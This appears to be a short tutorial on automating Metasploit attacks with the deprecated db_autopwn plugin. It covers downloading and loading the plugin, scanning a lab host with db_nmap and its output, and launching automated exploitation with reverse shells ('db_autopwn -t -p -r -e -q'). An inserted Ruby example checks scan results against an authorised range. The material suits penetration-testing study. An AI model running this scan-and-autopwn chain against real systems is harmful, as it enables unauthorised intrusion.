First we need to download the plugin called Autopwn from GitHub. It's deprecated but still works, most of the time :))) There are other ways to automate things (see: https://www.rapid7.com/blog/post/2011/12/08/six-ways-to-automate-metasploit/ ).
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
Then copy the plugin into the Metasploit Framework plugins directory:
cp db_autopwn.rb /usr/share/metasploit-framework/plugins
Then load the plugin within the Metasploit Framework:
load db_autopwn
[*] Successfully loaded plugin: db_autopwn
Create a new workspace and import/create your targets. Otherwise autopwn will use all the hosts/targets within your (default) workspace.
Here we create a new workspace with the name Local01:
workspace -a Local01
[*] Added workspace: Local01
[*] Workspace: Local01
Then use db_nmap with your own specifications to fill this workspace/database.
db_nmap -Pn 192.168.1.9
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-19 14:46 EDT
[*] Nmap: Nmap scan report for 192.168.1.9
[*] Nmap: Host is up (0.0020s latency).
[*] Nmap: Not shown: 988 closed tcp ports (conn-refused)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 22/tcp open ssh
[*] Nmap: 23/tcp open telnet
[*] Nmap: 25/tcp open smtp
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 3306/tcp open mysql
[*] Nmap: 5432/tcp open postgresql
[*] Nmap: 8009/tcp open ajp13
[*] Nmap: 8180/tcp open unknown
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
You can view the hosts by typing: hosts and the services by typing: services 🙂
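A scope check that fits at this point, before anything automated runs against the workspace (added example, not part of the original post or of Metasploit): it parses db_nmap console output in the format shown above and lists every host that falls outside the authorized ranges. The 10.0.0.5 host in the sample and the authorized range are constructed assumptions.

```ruby
require 'ipaddr'

# Constructed sample: db_nmap console output in the format shown above,
# with one extra host (10.0.0.5) added to illustrate an out-of-scope entry.
SAMPLE = <<~LOG
  [*] Nmap: Nmap scan report for 192.168.1.9
  [*] Nmap: Host is up (0.0020s latency).
  [*] Nmap: PORT STATE SERVICE
  [*] Nmap: 21/tcp open ftp
  [*] Nmap: 23/tcp open telnet
  [*] Nmap: 445/tcp open microsoft-ds
  [*] Nmap: Nmap scan report for 10.0.0.5
  [*] Nmap: 22/tcp open ssh
LOG

# Assumed authorized range for the engagement (hypothetical value).
AUTHORIZED = ['192.168.1.0/24'].freeze

# Parse "[*] Nmap:" lines into { host => [[port, proto, service], ...] }.
# Handles IPv4 report lines, with or without a hostname in front of the address.
def parse_db_nmap(text)
  hosts = {}
  current = nil
  text.each_line do |line|
    body = line.sub(/\A\[\*\] Nmap: /, '').strip
    if (m = body.match(/\ANmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?\z/))
      current = m[1]
      hosts[current] = []
    elsif current && (m = body.match(%r{\A(\d+)/(tcp|udp)\s+open\s+(\S+)}))
      hosts[current] << [m[1].to_i, m[2], m[3]]
    end
  end
  hosts
end

# Return the scanned hosts that fall outside every authorized CIDR range.
def out_of_scope(hosts, cidrs)
  nets = cidrs.map { |c| IPAddr.new(c) }
  hosts.keys.reject { |h| nets.any? { |n| n.include?(IPAddr.new(h)) } }
end

hosts = parse_db_nmap(SAMPLE)
hosts.each { |h, svcs| puts "#{h}: #{svcs.map { |p, pr, s| "#{p}/#{pr} #{s}" }.join(', ')}" }
bad = out_of_scope(hosts, AUTHORIZED)
puts "Out of scope, remove from the workspace first: #{bad.join(', ')}" unless bad.empty?
```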
To run autopwn use the following command:
db_autopwn -t -p -r -e -q
Then wait for a while and review the output.